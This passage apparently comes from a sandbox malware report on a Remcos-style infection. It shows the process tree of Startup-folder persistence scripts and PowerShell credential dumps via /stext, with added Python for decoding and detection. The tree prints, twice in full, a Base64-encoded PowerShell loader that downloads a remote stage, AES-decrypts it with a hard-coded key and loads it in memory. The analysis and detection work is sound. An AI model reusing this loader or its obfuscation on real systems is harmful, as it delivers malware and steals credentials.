QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
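The encoded command line above is the whole first stage, so it is worth decoding rather than only flagging. Base64-decoding the part of the blob the report shows gives a PowerShell loader that downloads https://0x0.st/8KuV.ps1 with iwr -UseBasicParsing (the junk token MICROSOFTSERVICEUPDATES is spliced into every keyword and into the URL, then stripped with .Replace), defines AES-CBC/PKCS7 decryption with a hard-coded Base64 key and IV, GZip decompression, and [Reflection.Assembly]::Load followed by EntryPoint.Invoke, builds the path C:\Users\<user>\dwm.bat from a second junk token ABC (the same dwm.bat the cmd.exe "File created" entry records), and reads it through [System.IO.File]::('txeTllAdaeR'[-1..-11] -join ''), a reversed ReadAllText. The Python decoder below is an added example and is not part of the Joe Sandbox report or of the sample: it pulls the Base64 literal out of a -Command line (tolerating the truncation the report shows), undoes the three string tricks until nothing changes, and extracts the URL, key, IV, dropped path and stage indicators. The embedded command line is a constructed stand-in built with the same obfuscation and harmless values (loader.example.invalid, a 0..31 byte key); it is not the report's blob.

```python
import base64
import re

# Constructed stand-in for the loader, NOT the blob from the report: same obfuscation tricks
# (junk token spliced into keywords and stripped with .Replace, reversed method name, AES key/IV
# as Base64 literals) with harmless values. loader.example.invalid and the 0..31 key are made up.
SAMPLE_KEY_B64 = base64.b64encode(bytes(range(32))).decode()  # 32-byte stand-in key
SAMPLE_IV_B64 = base64.b64encode(bytes(range(16))).decode()   # 16-byte stand-in IV
SAMPLE_SCRIPT = (
    "iex ((iex (('iJUNKwr -JUNKUseBasicParsing \"hJUNKttps://loader.example.invalid/JUNKstage2.ps1\"')"
    ".Replace('JUNK',''))).Content);"
    "function dec($p){$a=[System.Security.Cryptography.Aes]::Create();"
    "$a.Mode=[System.Security.Cryptography.CipherMode]::CBC;"
    "$a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;"
    f"$a.Key=[System.Convert]::FromBase64String('{SAMPLE_KEY_B64}');"
    f"$a.IV=[System.Convert]::FromBase64String('{SAMPLE_IV_B64}');"
    "$d=$a.CreateDecryptor();$d.TransformFinalBlock($p,0,$p.Length)}"
    "IEX '$s=New-Object System.IO.MABCemABCoryStABCream(,$b);'.Replace('ABC', '');"
    "IEX '$z=New-Object System.IO.CABCompression.GZABCipStream($s,"
    "[IO.Compression.CompressionMode]::Decompress);'.Replace('ABC','');"
    "IEX '$asm=[System.RABCeflection.AsABCsembly]::LABCoad([byte[]]$out);'.Replace('ABC', '');"
    "IEX '$asm.EABCntryPoint.IABCnvoke($null,$null);'.Replace('ABC','');"
    "$path='C:\\Users\\'+$env:USERNAME+'ABC\\ABCdABCwABCmABC.ABCbABCaABCtABC'.Replace('ABC', '');"
    "$t=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($path)"
)
SAMPLE_CMDLINE = (
    'powershell.exe -noprofile -windowstyle hidden -ep bypass -Command '
    '"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
    + base64.b64encode(SAMPLE_SCRIPT.encode()).decode() + "'))"
)

_REPLACE_RE = re.compile(r"'([^']*)'(\)?)\.Replace\('([^']+)',\s*''\)")      # 'liTOKteral'.Replace('TOK','')
_REVERSE_RE = re.compile(r"\('([^']+)'\[-1\.\.-(\d+)\]\s*-join\s*''\)")     # ('txeT'[-1..-4] -join '')
_INDIRECT_RE = re.compile(r"::\('([A-Za-z_][A-Za-z0-9_]*)'\)\(")           # [Type]::('Name')(args)


def extract_b64_argument(cmdline):
    """Return the literal inside FromBase64String('...'); the closing quote may be missing in a truncated log."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        raise ValueError("no FromBase64String literal in command line")
    return m.group(1)


def decode_b64_lenient(blob):
    """Base64-decode, dropping an incomplete trailing quartet so a cut-off blob still yields its prefix."""
    blob = re.sub(r"[^A-Za-z0-9+/=]", "", blob)
    blob = blob[: len(blob) - len(blob) % 4]
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def deobfuscate(script):
    """Undo the loader's string tricks until a fixed point is reached."""
    prev = None
    while prev != script:
        prev = script
        script = _REPLACE_RE.sub(lambda m: "'" + m.group(1).replace(m.group(3), "") + "'" + m.group(2), script)
        script = _REVERSE_RE.sub(lambda m: "('" + m.group(1)[::-1][: int(m.group(2))] + "')", script)
        script = _INDIRECT_RE.sub(r"::\1(", script)
    return script


# Substrings that only become visible after deobfuscation; each marks one stage of the loader.
STAGES = {
    "remote_fetch": "-UseBasicParsing",
    "aes_decrypt": "TransformFinalBlock",
    "gzip_inflate": "GZipStream",
    "reflective_load": "Reflection.Assembly]::Load",
    "entrypoint_invoke": "EntryPoint.Invoke",
    "self_read": "File]::ReadAllText",
}


def analyze_cmdline(cmdline):
    """Decode and deobfuscate a -Command line; return the cleaned script plus the indicators pulled from it."""
    script = deobfuscate(decode_b64_lenient(extract_b64_argument(cmdline)))
    key = re.search(r"\.Key\s*=\s*\[System\.Convert\]::FromBase64String\('([^']+)'\)", script)
    iv = re.search(r"\.IV\s*=\s*\[System\.Convert\]::FromBase64String\('([^']+)'\)", script)
    return {
        "script": script,
        "policy_bypass": bool(re.search(r"-e(?:p|xecutionpolicy)\s+bypass", cmdline, re.I)),
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I)),
        "urls": re.findall(r"https?://[^\s\"')]+", script),
        "aes_key_b64": key.group(1) if key else None,
        "aes_iv_b64": iv.group(1) if iv else None,
        "aes_key_bits": len(base64.b64decode(key.group(1))) * 8 if key else None,
        "script_paths": re.findall(r"'(\\[^']*\.(?:bat|cmd|ps1|exe|dll))'", script),
        "stages": [name for name, needle in STAGES.items() if needle in script],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_cmdline(SAMPLE_CMDLINE), indent=2))
```

Run it on the report's command line by replacing SAMPLE_CMDLINE with the full "powershell.exe ... FromBase64String('...')" string from the process list; because the report cuts the blob off, the decoder drops the incomplete final Base64 quartet and the tail of the script is simply absent, while the URL, key and IV near the front survive. The recovered key and IV are what you need to decrypt and gunzip the payload the loader reads from dwm.bat.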
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"
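The process chain above is the part of this report a detection engineer can act on directly: cmd.exe /K on a StartupScript_*.cmd dropped in the per-user Startup folder, a hidden -ep bypass PowerShell that decodes its body from Base64, and 32-bit (SysWOW64) powershell.exe spawning powershell.exe with /stext <file> under %TEMP%. That /stext argument is the NirSoft command-line password-recovery convention; Remcos reuses the WebBrowserPassView and Mail PassView tools the signatures section flags and runs them inside a child process, which is why the rule below keys on parent and child both being PowerShell. The rules are an added example, not Joe Sandbox's Sigma rules or anything from the sample: four process-creation checks run over constructed Sysmon-style events modelled on this process tree (event ids and the two benign control events are made up, the paths are the ones the report shows).

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events modelled on this report's process tree, not sandbox
# output. Event ids and the benign control events (5, 6) are made up; the Base64 body in event 2 is a
# placeholder that decodes to "iex ...", not the loader.
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EXPLORER = r"C:\Windows\explorer.exe"
STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
EVENTS = [
    {"id": 1, "parent": EXPLORER, "image": CMD,
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" "'},
    {"id": 2, "parent": CMD, "image": PS32,
     "cmdline": '"' + PS32 + '" -noprofile -windowstyle hidden -ep bypass -Command '
                '"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'aWV4IC4uLg==\'))"'},
    {"id": 3, "parent": PS32, "image": PS32,
     "cmdline": PS32 + r' /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"'},
    {"id": 4, "parent": EXPLORER, "image": CMD,
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""' + STARTUP + r'\StartupScript_f1e01fdf.cmd" "'},
    {"id": 5, "parent": EXPLORER, "image": PS64,
     "cmdline": r'powershell.exe -NoProfile -File C:\Scripts\inventory.ps1'},
    {"id": 6, "parent": EXPLORER, "image": CMD,
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\build.bat"'},
]

STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\"]+?\.(?:cmd|bat|vbs|js|ps1)\b", re.I)


def _base(path):
    return ntpath.basename(path).lower()


def is_powershell(image):
    return _base(image) in ("powershell.exe", "pwsh.exe")


def rule_encoded_hidden_powershell(ev):
    """-ep bypass together with a hidden window or an inline Base64 body: the loader's own launch line."""
    if not is_powershell(ev["image"]):
        return None
    c = ev["cmdline"]
    bypass = re.search(r"-e(?:p|xecutionpolicy)\s+bypass", c, re.I)
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", c, re.I)
    b64 = re.search(r"FromBase64String|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", c, re.I)
    return ("encoded_hidden_powershell", "high") if bypass and (hidden or b64) else None


def rule_startup_folder_script(ev):
    """A script interpreter launched on a file inside the per-user Startup folder (persistence)."""
    if _base(ev["image"]) in ("cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe") \
            and STARTUP_RE.search(ev["cmdline"]):
        return ("startup_folder_script", "medium")
    return None


def rule_stext_in_powershell(ev):
    """powershell.exe spawning powershell.exe with NirSoft's /stext <file> under %TEMP%: credential dump."""
    if is_powershell(ev["image"]) and is_powershell(ev["parent"]) \
            and re.search(r"\s/stext\s+\"?[^\"]*\\AppData\\Local\\Temp\\", ev["cmdline"], re.I):
        return ("nirsoft_stext_in_powershell", "critical")
    return None


def rule_wow64_powershell_from_native_parent(ev):
    """A 64-bit System32 parent explicitly starting the 32-bit SysWOW64 PowerShell (fits a 32-bit payload)."""
    if is_powershell(ev["image"]) and "\\syswow64\\" in ev["image"].lower() \
            and ev["parent"].lower().startswith("c:\\windows\\system32\\"):
        return ("wow64_powershell_from_native_parent", "low")
    return None


RULES = (rule_encoded_hidden_powershell, rule_startup_folder_script,
         rule_stext_in_powershell, rule_wow64_powershell_from_native_parent)


def triage(events):
    """Map event id -> names of the rules that fired, in RULES order; events with no hit are omitted."""
    findings = {}
    for ev in events:
        names = [hit[0] for hit in (rule(ev) for rule in RULES) if hit]
        if names:
            findings[ev["id"]] = names
    return findings


if __name__ == "__main__":
    for eid, names in triage(EVENTS).items():
        print(eid, ", ".join(names))
```

The /stext rule alone would also catch a legitimately installed NirSoft tool, so it keys on the host process being PowerShell with a PowerShell parent, which has no benign reason to take that switch. The WOW64 check is deliberately low severity: 32-bit PowerShell is launched explicitly by some installers, but combined with the first rule it is corroborating evidence that the script is preparing a 32-bit host for injection.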
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd" "
